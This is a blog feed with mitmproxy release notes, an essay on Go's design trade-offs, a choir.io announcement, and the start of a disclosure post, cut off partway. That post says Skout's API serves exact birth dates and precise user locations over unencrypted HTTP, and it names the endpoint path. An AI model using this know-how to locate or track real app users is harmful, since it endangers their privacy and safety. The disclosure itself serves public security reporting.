https://corte.si/posts/code/mitmproxy/announce_0_10/ <div class="media"> <a href="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png"> <img src="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png" /> </a> </div> <p>I've just released v0.10 of both <a rel="external" href="http://mitmproxy.org">mitmproxy</a> and <a rel="external" href="http://pathod.org">pathod</a>. This is chiefly a bugfix release, with a few nice additional features to sweeten the pot.</p> <div class="media"> <a href="mitmproxy-webapp.png"> <img src="mitmproxy-webapp.png" /> </a> </div> <p>Perhaps the most visible change has been a huge improvement in the recommended method for installing the mitmproxy certificates. Certs are now served straight from the web application hosted in mitmproxy, which means that in most cases cert installation is as simple as typing the mitmproxy URL into the devce driver. <a rel="external" href="http://mitmproxy.org/doc/certinstall/webapp.html">See the docs</a> for more.</p> <p>In other, minor news - I see that the <a rel="external" href="https://github.com/mitmproxy/mitmproxy">mitmproxy project</a> has just passed 2000 stars on GitHub. Between PyPi and the files we serve from <a rel="external" href="http://mitmproxy.org">mitmproxy.org</a>, the project has also seen nearly 100k downloads in the last year (after removing obvious bots). I know, I know - figures like these don't mean much, but it's still nice to see that people are using and enjoying mitmproxy.</p> <h2 id="changelog">Changelog</h2> <ul> <li>Support for multiple scripts and multiple script arguments</li> <li>Easy certificate install through the in-proxy web app, which is now enabled by default</li> <li><a rel="external" href="http://mitmproxy.org/doc/features/forwardproxy.html">Forward proxy mode</a>, that forwards proxy requests to an upstream HTTP server</li> <li>Reverse proxy now works with SSL</li> <li>Search within a request/response using the "/" and "n" shortcut keys</li> <li>A view that beatifies CSS files if cssutils is available</li> <li>Many bug fix, documentation improvements, and more.</li> </ul> How I Learned to Stop Worrying and Love Golang 2013-11-21T00:00:00+00:00 2013-11-21T00:00:00+00:00 https://corte.si/posts/code/go/golang-practicaly-beats-purity/ <p>Here's a riff on Malcolm Gladwell's <a rel="external" href="http://en.wikipedia.org/wiki/Outliers_(book)">rule of thumb about mastery</a>: you don't really know a programming language until you've written 10,000 lines of production-quality code in it. Like the original this is a generalization that is undoubtedly false in many cases - still, it broadly matches my intuition for most languages and most programmers<sup class="footnote-reference"><a href="#3">1</a></sup>. At the beginning of this year, I wrote <a href="https://corte.si/posts/code/go/go-rant/">a sniffy post about Go</a> when I was about 20% of the way to knowing the language by this measure. Today's post is an update from further along the curve - about 80% - following a recent set of adventures that included entirely rewriting <a rel="external" href="http://choir.io">choir.io</a>'s core dispatcher in Go. My opinion of Go has changed significantly in the meantime. Despite my initial exasperation, I found that the experience of actually writing Go was not unpleasant. The shallow issues became less annoying over time (perhaps just due to habituation), and the deep issues turned out to be less problematic in practice than in theory. Most of all, though, I found Go was just a fun and productive language to work in. Go has colonized more and more use cases for me, to the point where it is now seriously eroding my use of both Python and C.</p> <p>After my rather slow Road to Damascus experience, I noticed something odd: I found it difficult to explain why Go worked so well in practice. Sure, Go has a triad of really smashing ideas (interfaces, channels and goroutines), but my list of warts and annoyances is long enough that it's not clear on paper that the upsides outweigh the downsides. So, my experience of actually cutting code in Go was at odds with my rational analysis of the language, which bugged me. I've thought about this a lot over the last few months, and eventually came up with an explanation that sounds like nonsense at first sight: Go's weaknesses are also its strengths. In particular, many design choices that seem to reduce coherence and maintainability at first sight actually combine to give the language a practical character that's very usable and compelling. Lets see if I can convince you that this isn't as crazy as it sounds.</p> <h2 id="maps-and-magic">Maps and magic</h2> <p>Lets pretend that we're the designers of Go, and see if we can follow the thinking that went into a seemingly simple part of the language - the value retrieval syntax for maps. We begin with the simplest possible case - direct, obvious, and familiar from a number of other languages:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>v</span><span style="color: #D73A49;"> :=</span><span> mymap[</span><span style="color: #032F62;">&quot;foo&quot;</span><span>]</span></span></code></pre> <p>It would be nice if we could keep it this simple, but there's a complication - what if "foo" doesn't exist in the map? The fact that Go doesn't have exceptions limits the possibilities. We can discard some gross options out of hand - for instance, making this a runtime error or returning a magic value flagging non-existence are both pretty horrible. A more plausible route is to pass an existence flag back as a second return value:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>v, ok</span><span style="color: #D73A49;"> :=</span><span> mymap[</span><span style="color: #032F62;">&quot;foo&quot;</span><span>]</span></span></code></pre> <p>So far, so logical, and if consistency was the primary goal, we would stop here. However, having two return arguments would make many common patterns of use inconvenient. You would constantly be discarding the <strong>ok</strong> flag in situations where it wasn't needed. Another repercussion is that you couldn't directly use the results in an <strong>if</strong> clause. Instead of a clean phrasing like this (relying on the zero value returned by default):</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">if map</span><span>[</span><span style="color: #032F62;">&quot;foo&quot;</span><span>] {</span></span> <span class="giallo-l"><span style="color: #6A737D;"> // Do something</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>... you would have to do this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> _, ok</span><span style="color: #D73A49;"> := map</span><span>[</span><span style="color: #032F62;">&quot;foo&quot;</span><span>]; ok {</span></span> <span class="giallo-l"><span style="color: #6A737D;"> // Do something</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>Ugh. What we really want, is to get the best of both worlds. The ease of the first signature, plus the flexibility of the second. In fact, Go does exactly that, in a surprising way: it discards some basic conceptual constraints, and makes the data returned by the map accessor depend on how many variables it's assigned to. When it's assigned to one variable, it just returns the value. When it's assigned to two variables, it also returns an existence flag.</p> <p>Compare this with Python. The dictionary access syntax is identical:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span>v</span><span style="color: #D73A49;"> =</span><span> mymap[</span><span style="color: #032F62;">&quot;foo&quot;</span><span>]</span></span></code></pre> <p>Python does have exceptions, so non-existence is signaled through a <strong>KeyError</strong>, and the dictionary interface includes a <strong>get</strong> method that allows the user to specify a default return when this is too cumbersome. This is certainly consistent on the surface, but there's also a deeper structure that helps the user understand what's going on. The square bracket accessor syntax is just syntactic sugar, because the call above is equivalent to this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span>v</span><span style="color: #D73A49;"> =</span><span> mymap.</span><span style="color: #005CC5;">__getitem__</span><span>(</span><span style="color: #032F62;">&quot;foo&quot;</span><span>)</span></span></code></pre> <p>In a sense, then, the value access is just a method call. The coder can write a dictionary of their own that acts just like a built-in dictionary<sup class="footnote-reference"><a href="#2">2</a></sup>, and can also build a clear mental model of what's going on underneath. Python dictionaries are conceptually built <em>up</em> from more primitive language elements, where Go maps are designed <em>down</em> from concrete use cases.</p> <h2 id="range-a-compendium-of-use-cases">Range: a compendium of use cases</h2> <p>An even stranger beast is the <strong>range</strong> clause of Go's for loops. Like map accessors, <strong>range</strong> will return either one value or two, depending on the number of variables assigned to. What's particularly revealing about <strong>range</strong> is the way these results differ depending on the data type being ranged over. Consider this piece of code, for example:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">for</span><span> x, y</span><span style="color: #D73A49;"> := range</span><span> v {</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>To figure out what this does, we need to know the type of <strong>v</strong>, and then consult a table like this:<sup class="footnote-reference"><a href="#1">3</a></sup></p> <table class="table table-bordered"> <tr> <th>Range expression</th> <th>1st Value</th> <th>2nd Value</th> </tr> <tr> <td>array or slice</td> <td>index i</td> <td>a[i]</td> </tr> <tr> <td>map</td> <td>key k</td> <td>m[k]</td> </tr> <tr> <td>string</td> <td>index i of rune</td> <td>rune int</td> </tr> <tr> <td>channel</td> <td>element</td> <td>error</td> </tr> </table> <p>What range does for arrays and maps seems consistent and not particularly surprising. Things get a tad slightly odd with channels. A second variable arguably doesn't make much sense when ranging over a channel, so trying to do this results in a compile time error. Not terribly consistent, but logical.</p> <p>Weirder still is <strong>range</strong> over strings. When operating on a string, range returns <a rel="external" href="http://golang.org/ref/spec#Constants">runes</a> (Unicode code points) not bytes. So, this code:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>s</span><span style="color: #D73A49;"> :=</span><span style="color: #032F62;"> &quot;a</span><span style="color: #005CC5;">\u00fc</span><span style="color: #032F62;">b&quot;</span></span> <span class="giallo-l"><span style="color: #D73A49;">for</span><span> a, b</span><span style="color: #D73A49;"> := range</span><span> s {</span></span> <span class="giallo-l"><span> fmt.</span><span style="color: #6F42C1;">Println</span><span>(a, b)</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>Prints this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>0 97</span></span> <span class="giallo-l"><span>1 252</span></span> <span class="giallo-l"><span>3 98</span></span></code></pre> <p>Notice the jump from 1 to 3 in the array index, because the rune at offset 1 is two bites wide in UTF-8. And look what happens when we now retrieve the value at that offset from the array. This:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>fmt.</span><span style="color: #6F42C1;">Println</span><span>(s[</span><span style="color: #005CC5;">1</span><span>])</span></span></code></pre> <p>Prints this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>195</span></span></code></pre> <p>What gives? At first glance, it's reasonable to expect this to print 252, as returned by <strong>range</strong>. That's wrong, though, because string access by index operates on bytes, so what we're given is the first byte of the UTF-8 encoding of the rune. This is bound to cause subtle bugs. Code that works perfectly on ASCII text simply due to the fact that UTF-8 encodes these in a single byte will fail mysteriously as soon as non-ASCII characters appear.</p> <p>My argument here is that <strong>range</strong> is a very clear example of design directly from concrete use cases down, with little concern for consistency. In fact, the table of <strong>range</strong> return values above is really just a compendium of use cases: at each point the result is simply the one that is most directly useful. So, it makes total sense that ranging over strings returns runes. In fact, doing anything else would arguably be incorrect. What's characteristic here is that no attempt was made to reconcile this interface with the core of the language. It serves the use case well, but feels jarring.</p> <h2 id="arrays-are-values-maps-are-references">Arrays are values, maps are references</h2> <p>One final example along these lines. A core irregularity at the heart of Go is that arrays are values, while maps are references. So, this code will modify the <strong>s</strong> variable:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">func</span><span style="color: #6F42C1;"> mod</span><span>(</span><span style="color: #E36209;">x</span><span style="color: #D73A49;"> map</span><span>[</span><span style="color: #D73A49;">int</span><span>]</span><span style="color: #D73A49;"> int</span><span>){</span></span> <span class="giallo-l"><span> x[</span><span style="color: #005CC5;">0</span><span>]</span><span style="color: #D73A49;"> =</span><span style="color: #005CC5;"> 2</span></span> <span class="giallo-l"><span>}</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">func</span><span style="color: #6F42C1;"> main</span><span>() {</span></span> <span class="giallo-l"><span> s</span><span style="color: #D73A49;"> := map</span><span>[</span><span style="color: #D73A49;">int</span><span>]</span><span style="color: #D73A49;">int</span><span>{}</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> mod</span><span>(s)</span></span> <span class="giallo-l"><span> fmt.</span><span style="color: #6F42C1;">Println</span><span>(s)</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>And print:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>map[0:2]</span></span></code></pre> <p>While this code won't:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">func</span><span style="color: #6F42C1;"> mod</span><span>(</span><span style="color: #E36209;">x</span><span> [</span><span style="color: #005CC5;">1</span><span>]</span><span style="color: #D73A49;">int</span><span>){</span></span> <span class="giallo-l"><span> x[</span><span style="color: #005CC5;">0</span><span>]</span><span style="color: #D73A49;"> =</span><span style="color: #005CC5;"> 2</span></span> <span class="giallo-l"><span>}</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">func</span><span style="color: #6F42C1;"> main</span><span>() {</span></span> <span class="giallo-l"><span> s</span><span style="color: #D73A49;"> :=</span><span> [</span><span style="color: #005CC5;">1</span><span>]</span><span style="color: #D73A49;">int</span><span>{}</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> mod</span><span>(s)</span></span> <span class="giallo-l"><span> fmt.</span><span style="color: #6F42C1;">Println</span><span>(s)</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>And will print:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>[0]</span></span></code></pre> <p>This is undoubtedly inconsistent, but it turns out not to be an issue in practice, mostly because slices <em>are</em> references, and are passed around much more frequently than arrays. This issue has surprised enough people to make it into the Go FAQ, <a rel="external" href="http://golang.org/doc/faq#references">where the justification is as follows</a>:</p> <blockquote> <p>There's a lot of history on that topic. Early on, maps and channels were syntactically pointers and it was impossible to declare or use a non-pointer instance. Also, we struggled with how arrays should work. Eventually we decided that the strict separation of pointers and values made the language harder to use. This change added some regrettable complexity to the language but had a large effect on usability: Go became a more productive, comfortable language when it was introduced.</p> </blockquote> <p>This is not exactly the clearest explanation for a technical decision I've ever read, so allow me to paraphrase: "Things evolved this way for pragmatic reasons, and consistency was never important enough to force a reconciliation".</p> <h2 id="the-g-word">The G Word</h2> <p>Now we get to that perpetual bugbear of Go critiques: the lack of generics. This, I think, is the deepest example of the Go designers' willingness to sacrifice coherence for pragmatism. One gets the feeling that the Go devs are a tad weary of this argument by now, but the issue is substantive and worth facing squarely. The crux of the matter is this: Go's built-in container types are super special. They can be parameterized with the type of their contained values in a way that user-written data structures can't be.</p> <p>The supported way to do generic data structures is to use blank interfaces. Lets look at an example of how this works in practice. First, here is a simple use of the built-in array type.</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>l</span><span style="color: #D73A49;"> :=</span><span style="color: #6F42C1;"> make</span><span>([]</span><span style="color: #D73A49;">string</span><span>,</span><span style="color: #005CC5;"> 1</span><span>)</span></span> <span class="giallo-l"><span>l[</span><span style="color: #005CC5;">0</span><span>]</span><span style="color: #D73A49;"> =</span><span style="color: #032F62;"> &quot;foo&quot;</span></span> <span class="giallo-l"><span>str</span><span style="color: #D73A49;"> :=</span><span> l[</span><span style="color: #005CC5;">0</span><span>]</span></span></code></pre> <p>In the first line we initialize the array with the type <strong>string</strong>. We then insert a value, and in the final line, we retrieve it. At this point, <strong>str</strong> has type <strong>string</strong> and is ready to use. The user-written analogue of this might be a modest data structure with <strong>put</strong> and <strong>get</strong> methods. We can define this using interfaces like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">type</span><span style="color: #6F42C1;"> gtype</span><span style="color: #D73A49;"> struct</span><span> {</span></span> <span class="giallo-l"><span> data</span><span style="color: #D73A49;"> interface</span><span>{}</span></span> <span class="giallo-l"><span>}</span></span> <span class="giallo-l"><span style="color: #D73A49;">func</span><span> (</span><span style="color: #E36209;">t </span><span style="color: #D73A49;">*</span><span style="color: #6F42C1;">gtype</span><span>)</span><span style="color: #6F42C1;"> put</span><span>(</span><span style="color: #E36209;">v</span><span style="color: #D73A49;"> interface</span><span>{}) {</span></span> <span class="giallo-l"><span> t.data</span><span style="color: #D73A49;"> =</span><span> v</span></span> <span class="giallo-l"><span>}</span></span> <span class="giallo-l"><span style="color: #D73A49;">func</span><span> (</span><span style="color: #E36209;">t </span><span style="color: #D73A49;">*</span><span style="color: #6F42C1;">gtype</span><span>)</span><span style="color: #6F42C1;"> get</span><span>()</span><span style="color: #D73A49;"> interface</span><span>{} {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> t.data</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>To use this structure, we would say:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>v</span><span style="color: #D73A49;"> :=</span><span style="color: #6F42C1;"> gtype</span><span>{}</span></span> <span class="giallo-l"><span>v.</span><span style="color: #6F42C1;">put</span><span>(</span><span style="color: #032F62;">&quot;foo&quot;</span><span>)</span></span> <span class="giallo-l"><span>str</span><span style="color: #D73A49;"> :=</span><span> v.</span><span style="color: #6F42C1;">get</span><span>().(</span><span style="color: #D73A49;">string</span><span>)</span></span></code></pre> <p>We can assign a string to a variable with the empty interface type without doing anything special, so <strong>put</strong> is simple. However, we need to use a type assertion on the way out, otherwise the <strong>str</strong> variable will have type <strong>interface{}</strong>, which is probably not what we want.</p> <p>There are a number of issues here. It's cosmetically bothersome that we have to place the burden of type assertion on the caller of our data structure, making the interface just a little bit less nice to use. But the problems extend beyond syntactic inconvenience - there's a substantive difference between these two ways of doing things. Trying to insert a value of the wrong type into the built-in array causes a compile-time error, but the type assertion acts at run-time and causes a panic on failure. The blank-interface paradigm sidesteps Go's compile time type checking, negating any benefit we may have received from it.</p> <p>The biggest issue for me, though, is the conceptual inconsistency. This is something that's difficult to put into words, so here's a picture:</p> <div class="media"> <a href="inconsistency.jpg"> <img src="inconsistency.jpg" /> </a> </div> <p>The fact that the built-in containers magically do useful things that user-written code can't irks me. It hasn't become less jarring over time, and still feels like a bit of grit in my eye that I can't get rid of. I might be an extreme case, but this is an aesthetic instinct that I think is shared by many programmers, and would have convinced many language designers to approach the problem differently.</p> <p>The extent to which Go's lack of generics is a critical problem, however, is not the point here. The meat of the matter is <strong>why</strong> this design decision was taken, and what it reveals about the character of Go. Here's how the lack of generics is <a rel="external" href="http://blog.golang.org/go-at-io-frequently-asked-questions">justified by the Go developers</a>:</p> <blockquote> <p>Many proposals for generics-like features have been mooted both publicly and internally, but as yet we haven't found a proposal that is consistent with the rest of the language. We think that one of Go's key strengths is its simplicity, so we are wary of introducing new features that might make the language more difficult to understand.</p> </blockquote> <p>Instead of creating the atomic elements needed to support generic data structures then adding a suite of them to the standard library, the Go team went the other way. There was a concrete use case for good data structures, and so they were added. Attempting a deep reconciliation with the rest of the language was a secondary requirement that was so unimportant that it fell by the wayside for Go 1.x.</p> <h1 id="a-pragmatic-beauty">A Pragmatic Beauty</h1> <p>Lets over-simplify for a moment and divide languages into two extreme camps. On the one hand, you have languages that are highly consistent, with most higher order functionality deriving from the atomic elements of the language. In this camp, we can find languages like Lisp. On the other hand are languages that are shamelessly eager to please. They tend to grow organically, sprouting syntax as needed to solve specific pragmatic problems. As a consequence, they tend to be large, syntactically diverse, not terribly coherent, and, occasionally, sometimes even <a rel="external" href="http://www.perlmonks.org/?node_id=663393">unparseable</a>. In this camp, we find languages like Perl. It's tempting to think that there exists a language somewhere in the infinite multiverse of possibilities that unites perfect consistency and perfect usability, but if there is, we haven't found it. The reality is that all languages are a compromise, and that balancing these two forces against each other is really what makes language design so hard. Placing too much value on consistency constrains the human concessions we can make for mundane use cases. Making too many concessions results in a language that lacks coherence.</p> <p>Like many programmers, I instinctively prefer purity and consistency and distrust "magic". In fact, I've never found a language with a strongly pragmatic bent that I really liked. Until now, that is. Because there's one thing I'm pretty clear on: Go is on the Perl end of this language design spectrum. It's designed firmly from concrete use cases down, and shows its willingness to sacrifice consistency for practicality again and again. The effects of this design philosophy permeate the language. This, then, is the source of my initial dissatisfaction with Go: I'm pre-disposed to dislike many of its core design decisions.</p> <p>Why, then, has the language grown on me over time? Well, I've gradually become convinced that practically-motivated flaws like the ones I list in this post add up to create Go's unexpected nimbleness. There's a weird sort of alchemy going on here, because I think any one of these decisions in isolation makes Go a worse language (even if only slightly). Together, however, they jolt Go out of a local maximum many procedural languages are stuck in, and take it somewhere better. Look again at each of the cases above, and imagine what the cumulative effect on Go would have been if the consistent choice had been made each time. The language would have more syntax, more core concepts to deal with, and be more verbose to write. Once you reason through the repercussions, you find that the result would have been a worse language overall. It's clear that Go is not the way it is because its designers didn't know better, or didn't care. Go is the result of a conscious pragmatism that is deep and audacious. Starting with this philosophy, but still managing to keep the language small and taut, with almost nothing dispensable or extraneous took great discipline and insight, and is a remarkable achievement.</p> <p>So, despite its flaws, Go remains graceful. It just took me a while to appreciate it, because I expected the grace of a ballet dancer, but found the grace of an battered but experienced bar-room brawler.</p> <p>--</p> <p>Edited to remove some inaccuracies about channels.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">3</sup> <p>Simplified from <a rel="external" href="https://code.google.com/p/go-wiki/wiki/Range">here</a>.</p> </div> <div class="footnote-definition" id="2"><sup class="footnote-definition-label">2</sup> <p>I don't mean mundane details like the syntax and core concepts of a language. In the case of Go, you can get a handle on these in an hour by reading the language specification.</p> </div> <div class="footnote-definition" id="3"><sup class="footnote-definition-label">1</sup> <p>Pedant hedge: yes, the illusion isn't perfect, and there are in fact subtle ways in which Python dictionaries are not just objects like any other.</p> </div> mitmproxy and pathod 0.9.2 2013-08-25T00:00:00+00:00 2013-08-25T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_9_2/ <div class="media"> <a href="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png"> <img src="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png" /> </a> </div> <p>I've just released v0.9.2 of both <a rel="external" href="http://mitmproxy.org">mitmproxy</a> and <a rel="external" href="http://pathod.org">pathod</a>. This is a bugfix release, chiefly to address two crashing issues affecting mitmproxy when relaying SSL traffic. A range of other fixes and improvements are also included - if you use mitmproxy, you should upgrade.</p> <h2 id="changelog">CHANGELOG</h2> <ul> <li>Improvements to the mitmproxywrapper.py helper script for OSX.</li> <li>Don't take minor version into account when checking for serialized file compatibility.</li> <li>Fix a bug causing resource exhaustion under some circumstances for SSL connections.</li> <li>Revamp the way we store interception certificates. We used to store these on disk, they're now in-memory. This fixes a race condition related to cert handling, and improves compatibility with Windows, where the rules governing permitted file names are weird, resulting in errors for some valid IDNA-encoded names.</li> <li>Display transfer rates for responses in the flow list.</li> <li>Many other small bugfixes and improvements.</li> </ul> Introducing choir.io 2013-08-16T00:00:00+00:00 2013-08-16T00:00:00+00:00 https://corte.si/posts/choir/intro/ <div class="media"> <a href="choir.png"> <img src="choir.png" /> </a> <div class="subtitle"> choir.io </div> </div> <p>Today, I'm raising the veil (slightly) on a new project - <a rel="external" href="https://choir.io">choir.io</a>. The most succinct description of choir.io is that it is a service that turns events into sound. Why would you want to do that? Well, I believe that there are compelling reasons to make sound part of your monitoring stack. Let's see if I can convince you.</p> <h2 id="the-soundscape">The soundscape</h2> <p>When I walk into my study every morning, I'm surrounded a rich, subtle soundscape that exists just beneath conscious perception. My air-conditioner, computers and monitors all emit hums and purrs. I can "tune in" to these if I focus, but they usually only draw my attention when something changes. When the power goes out there is a deathly silence, when a CPU fan noise changes pitch or texture, it bothers me immediately.</p> <p>Layered over this background are more obtrusive sounds, closer to the threshold of awareness - the clacking of keyboards, faint noises of my family getting ready for their day upstairs, the front door opening and closing. Whether or not I pay attention to these is somewhat context dependent. Am I waiting, or instance, for my wife and kids to start trooping down the stairs so I can join them for my son's swimming lesson? If I am, I listen out for those sounds specifically. I get an enormous amount of information about my world from these more discrete, event-related noises.</p> <p>Finally, there are the really obtrusive sounds, things that immediately get my attention. This might be someone saying my name, my phone ringing, a knock at the door, or a smoke alarm. I'm very aware of these, and they usually signal something I have to deal with immediately.</p> <p>These layers of more and less obtrusive sounds form a soundscape that is ever-present, and utterly necessary in our day-to-day lives. Notice how effortless this process of extracting meaning from our ambient sounds is. Our minds process this information stream without any mental exertion, filters out what we don't need to notice, and draws our attention to what we do. There's a lot of cognitive research (that I might delve into in future posts) that show that our brains and auditory systems are specifically designed to make sense of the world in this way.</p> <p>We have nothing like this rich texture of ambient awareness for the technology that surrounds us. Our monitoring mechanisms seem to be stuck at the ends of the intrusiveness spectrum. At one end, we have email notifications that demand our attention until we start to ignore them or silence them with a filter. At the other end we have passive status dashboards that require us to remember to switch context and visually consult a different interface. Choir.io doesn't aim to supplant either of these, but tries to fill in the blank portion of the awareness spectrum between them.</p> <p>When I sit at my desk, I can hear our server architecture humming away. There's the subtle pitter-patter of hits to various webservers, the occasional clack of an SSH login. Occasionally there is a chime when @alexdong pushes to Github, followed shortly by the celebratory cheer of a server deploy. When I hear the jarring note of a 500 server error, I switch context to view logs or a dashboard, but otherwise my focus stays with my editor window. Choir is young, but it's already become an indispensable part of my life.</p> <h2 id="challenges-and-next-steps">Challenges and next steps</h2> <p>There are a number of key questions that we'd like to answer with the help of our intrepid early adopters. First among these is the question of soundscape design. What makes a good sound pack? What is the right mix of intrusive and non-intrusive sounds? How do we construct soundscapes that blend into the background like natural sounds do? Another set of questions surrounds the API and integration. What is the right blend of simplicity and power is in the API? Which services should we integrate with next?</p> <p>There are some obvious next steps in the works. We recognize that sound pack design is a deep problem with subjective solutions. So, letting users assemble, edit and eventually share their own sound packs is high on our list of priorities. Free-standing Choir.io player apps for Windows and OSX will also be on the way soon, so you won't need to remember to keep a browser tab open. Technical improvements to the API that are on the way include UDP and SSL support.</p> <p>Choir is trying to do something new, and we want as much feedback as early in the process as possible. So, we've decided to start sending out invites today, even though Choir is far from the polished system that it will be in a few months. If you're brave, willing to give frank feedback, and want to help us explore this exciting idea, please <a rel="external" href="https://choir.io">request an invite</a>.</p> mitmproxy 0.9.1 2013-06-16T00:00:00+00:00 2013-06-16T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_9_1/ <div class="media"> <a href="mitmproxy_0_9_1.png"> <img src="mitmproxy_0_9_1.png" /> </a> </div> <p>I'm happy to announce the release of <a rel="external" href="http://mitmproxy.org">mitmproxy 0.9.1</a>. This is a bugfix release, with no significant changes in behaviour.</p> <p>As hinted in my previous release note, the project itself is also evolving. As of this release, mitmproxy and its sister projects (<a rel="external" href="http://pathod.net">pathod</a> and <a rel="external" href="https://github.com/mitmproxy/netlib">netlib</a>) are housed under a separate organization on Github, rather than my own personal space:</p> <p><a class="btn" href="https://github.com/mitmproxy">github.com/mitmproxy</a></p> <p>I'm also very happy to welcome the first external core developer to the mitmproxy projext: <a rel="external" href="http://maximilianhils.com/">Maximilian Hils</a>. Max is the author of <a rel="external" href="http://honeyproxy.org/">HoneyProxy</a>, a web analysis front-end for mitmproxy. In the next few months, he'll be working on integrating and expanding his work to become mitmproxy's official web interface. Max's efforts will be sponsored by Google under their <a rel="external" href="http://www.google-melange.com/gsoc/homepage/google/gsoc2013">Summer of Code</a> program, and will be mentored by the <a rel="external" href="http://www.honeynet.org/">HoneyNet Project</a>.</p> <h2 id="changelog">Changelog</h2> <ul> <li>Use "correct" case for Content-Type headers added by mitmproxy.</li> <li>Make UTF environment detection more robust.</li> <li>Improved MIME-type detection for viewers.</li> <li>Always read files in binary mode (Windows compatibility fix).</li> <li>Correct PyOpenSSL dependency declaration.</li> <li>Some developer documentation.</li> </ul> Skout: a devastating privacy vulnerability 2013-05-31T00:00:00+00:00 2013-05-31T00:00:00+00:00 https://corte.si/posts/security/skout/ <p>I've become a bit weary of the process of public vulnerability disclosure - I'm much more likely nowadays to just drop companies an anonymous notice and move on. Every so often, though, I come across an issue so egregious that talking about it publicly seems like an imperative. This is one of them.</p> <p>First, some background. Skout is a location-based mobile social network. The idea is to allow people to meet others in their area, semi-anonymously, get to know them, and then perhaps line up a meeting in meatspace. As far as I can tell, a huge fraction of the userbase are singles, using Skout as an ad-hoc dating app. Skout's scale is significant - they don't release exact user numbers, but I've seen claims of more than 10 million users, and a growth rate of a million users per month.</p> <p>In 2012, Skout went through a major PR catastrophe, when its service was linked to <a rel="external" href="http://bits.blogs.nytimes.com/2012/06/12/after-rapes-involving-children-skout-a-flirting-app-faces-crisis/">no fewer than 3 separate rapes of children</a> by adult men posing as teenagers. Skout immediately suspended the service for teenagers and went through a security re-vamp. A month later, <a rel="external" href="http://blog.skout.com/2012/07/13/teens-welcome-back-to-skout/">teens were allowed back</a>, with Skout making much of its new safety system, "advanced, proprietary algorithms" to weed out stalkers, and its long-term commitment to community safety.</p> <p>Given this background, the problem I found is simple but devastating. The Skout mobile application talks to Skout's servers through a simple API. When a user's profile is viewed an unencrypted, plain-HTTP request is made to to a path like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>http://i22.skout.com/services/ServerService/getProfile</span></span></code></pre> <p>What's returned is a blob of XML containing the user's complete profile data. In fact, the profile data is <em>too</em> complete, including some bits of data information that is never actually used by the app. For example, we can see the user's exact date of birth:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="xml"><span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">ax213:birthdayDate</span><span>&gt;xx/xx/1995&lt;/</span><span style="color: #22863A;">ax213:birthdayDate</span><span>&gt;</span></span></code></pre> <p>... but only the user's age in years is actually displayed. Most serious, however, is the high-precision location information that is returned in the ax213:homeLocation and ax213:location tags:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="xml"><span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">ax213:latitude</span><span>&gt;-xx.xxx&lt;/</span><span style="color: #22863A;">ax213:latitude</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">ax213:longitude</span><span>&gt;xxx.xxx&lt;/</span><span style="color: #22863A;">ax213:longitude</span><span>&gt;</span></span></code></pre> <p>The three decimal places of precision in the co-ordinates is enough to locate a user to within about 110 meters north-south, and substantially less than that east-west depending on the distance from the equator. Here's what that looks like in a hypothetical example:</p> <div class="media"> <a 